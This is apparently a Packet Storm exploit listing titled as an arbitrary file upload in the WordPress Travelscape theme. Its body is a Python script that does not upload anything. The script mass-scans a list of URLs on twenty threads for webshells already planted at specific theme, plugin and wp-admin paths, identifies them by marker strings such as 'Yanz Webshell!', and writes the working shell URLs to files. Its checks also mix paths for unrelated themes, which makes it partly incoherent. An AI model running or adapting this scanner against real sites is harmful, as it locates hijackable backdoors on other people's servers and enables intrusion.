WordPress Travelscape Theme 1.0.3 Arbitrary File Upload

2024-04-0800:00:00
Milad Karimi
packetstormsecurity.com
wordpress travelscape theme
arbitrary file upload
msq_403
yanz webshell
digital-download new.php
epinyins.php
wp-admin dropdown.php
7.4 High
AI Score
Confidence
Low
JSON
`# Exploit Title: Wordpress Theme Travelscape v1.0.3 - Arbitrary File Upload  
# Date: 2024-04-01  
# Author: Milad Karimi (Ex3ptionaL)  
# Category : webapps  
# Tested on: windows 10 , firefox  
  
import sys  
import os.path  
import requests  
import re  
import urllib3  
from requests.exceptions import SSLError  
from multiprocessing.dummy import Pool as ThreadPool  
from colorama import Fore, init  
init(autoreset=True)  
error_color = Fore.RED  
info_color = Fore.CYAN  
success_color = Fore.GREEN  
highlight_color = Fore.MAGENTA  
requests.urllib3.disable_warnings()  
headers = {  
'Connection': 'keep-alive',  
'Cache-Control': 'max-age=0',  
'Upgrade-Insecure-Requests': '1',  
'User-Agent': 'Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M;  
wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107  
Mobile Safari/537.36',  
'Accept':  
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',  
  
'Accept-Encoding': 'gzip, deflate',  
'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',  
'Referer': 'www.google.com'  
}  
def URLdomain(url):  
if url.startswith("http://"):  
url = url.replace("http://", "")  
elif url.startswith("https://"):  
url = url.replace("https://", "")  
if '/' in url:  
url = url.split('/')[0]  
return url  
def check_security(url):  
fg = success_color  
fr = error_color  
try:  
url = 'http://' + URLdomain(url)  
check = requests.get(url +  
'/wp-content/themes/travelscape/json.php', headers=headers,  
allow_redirects=True, timeout=15)  
if 'MSQ_403' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('MSQ_403.txt', 'a').write(url +  
'/wp-content/themes/travelscape/json.php\n')  
else:  
url = 'https://' + URLdomain(url)  
check = requests.get(url +  
'/wp-content/themes/aahana/json.php', headers=headers,  
allow_redirects=True, verify=False, timeout=15)  
if 'MSQ_403' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('MSQ_403.txt', 'a').write(url +  
'/wp-content/themes/aahana/json.php\n')  
else:  
print(' -| ' + url + ' --> {}[Failed]'.format(fr))  
check = requests.get(url + '/wp-content/themes/travel/issue.php',  
headers=headers, allow_redirects=True, timeout=15)  
if 'Yanz Webshell!' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('wso.txt', 'a').write(url +  
'/wp-content/themes/travel/issue.php\n')  
else:  
url = 'https://' + URLdomain(url)  
check = requests.get(url + '/about.php', headers=headers,  
allow_redirects=True, timeout=15)  
if 'Yanz Webshell!' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('wso.txt', 'a').write(url + '/about.php\n')  
else:  
url = 'https://' + URLdomain(url)  
check = requests.get(url +  
'/wp-content/themes/digital-download/new.php', headers=headers,  
allow_redirects=True, timeout=15)  
if '#0x2525' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('digital-download.txt', 'a').write(url +  
'/wp-content/themes/digital-download/new.php\n')  
else:  
print(' -| ' + url + ' --> {}[Failed]'.format(fr))  
url = 'http://' + URLdomain(url)  
check = requests.get(url + '/epinyins.php', headers=headers,  
allow_redirects=True, timeout=15)  
if 'Uname:' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('wso.txt', 'a').write(url + '/epinyins.php\n')  
else:  
print(' -| ' + url + ' --> {}[Failed]'.format(fr))  
url = 'https://' + URLdomain(url)  
check = requests.get(url + '/wp-admin/dropdown.php',  
headers=headers, allow_redirects=True, verify=False, timeout=15)  
if 'Uname:' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('wso.txt', 'a').write(url + '/wp-admin/dropdown.php\n')  
else:  
url = 'https://' + URLdomain(url)  
check = requests.get(url +  
'/wp-content/plugins/dummyyummy/wp-signup.php', headers=headers,  
allow_redirects=True, verify=False, timeout=15)  
if 'Simple Shell' in check.text:  
print(' -| ' + url + ' --> {}[Successfully]'.format(fg))  
open('dummyyummy.txt', 'a').write(url +  
'/wp-content/plugins/dummyyummy/wp-signup.php\n')  
else:  
print(' -| ' + url + ' --> {}[Failed]'.format(fr))  
except Exception as e:  
print(f' -| {url} --> {fr}[Failed] due to: {e}')  
def main():  
try:  
url_file_path = sys.argv[1]  
except IndexError:  
url_file_path = input(f"{info_color}Enter the path to the file  
containing URLs: ")  
if not os.path.isfile(url_file_path):  
print(f"{error_color}[ERROR] The specified file path is  
invalid.")  
sys.exit(1)  
try:  
urls_to_check = [line.strip() for line in open(url_file_path, 'r',  
encoding='utf-8').readlines()]  
except Exception as e:  
print(f"{error_color}[ERROR] An error occurred while reading the  
file: {e}")  
sys.exit(1)  
pool = ThreadPool(20)  
pool.map(check_security, urls_to_check)  
pool.close()  
pool.join()  
print(f"{info_color}Security check process completed successfully.  
Results are saved in corresponding files.")  
if __name__ == "__main__":  
main()  
  
  
`
7.4 High
AI Score
Confidence
Low
JSON